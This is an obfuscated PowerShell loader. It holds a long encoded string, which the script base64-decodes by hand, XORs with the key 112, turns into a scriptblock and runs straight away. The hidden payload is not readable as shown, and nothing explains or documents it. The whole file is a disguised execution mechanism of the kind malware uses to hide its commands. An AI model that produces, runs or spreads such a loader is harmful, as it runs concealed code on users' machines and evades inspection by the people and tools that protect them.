$fav=112
$lop="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"
$ukm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
$pji=[int](($lop.Length/4)*3)
if($lop.EndsWith('==')){$pji=$pji-2}elseif($lop.EndsWith('=')){$pji=$pji-1}
$ttb=New-Object byte[] $pji
$ijx=0
for($fxo=0;$fxo-lt $lop.Length;$fxo+=4){
$qta=$ukm.IndexOf($lop[$fxo])
$psi=$ukm.IndexOf($lop[$fxo+1])
$mwl=0
if($lop[$fxo+2] -ne '='){$mwl=$ukm.IndexOf($lop[$fxo+2])}
$fff=0
if($lop[$fxo+3] -ne '='){$fff=$ukm.IndexOf($lop[$fxo+3])}
$iam=($qta -shl 18)-bor($psi -shl 12)-bor($mwl -shl 6)-bor $fff
if($ijx -lt $pji){$ttb[$ijx]=($iam -shr 16)-band 255;$ijx++}
if($ijx -lt $pji){$ttb[$ijx]=($iam -shr 8)-band 255;$ijx++}
if($ijx -lt $pji){$ttb[$ijx]=$iam -band 255;$ijx++}
}
$xnp=New-Object byte[] $pji
for($apm=0;$apm-lt $pji;$apm++){$xnp[$apm]=$ttb[$apm]-bxor $fav}
$zip=''
for($apm=0;$apm-lt $pji;$apm++){$zip += [char]$xnp[$apm]}
$lse=[scriptblock]::Create($zip)
& $lse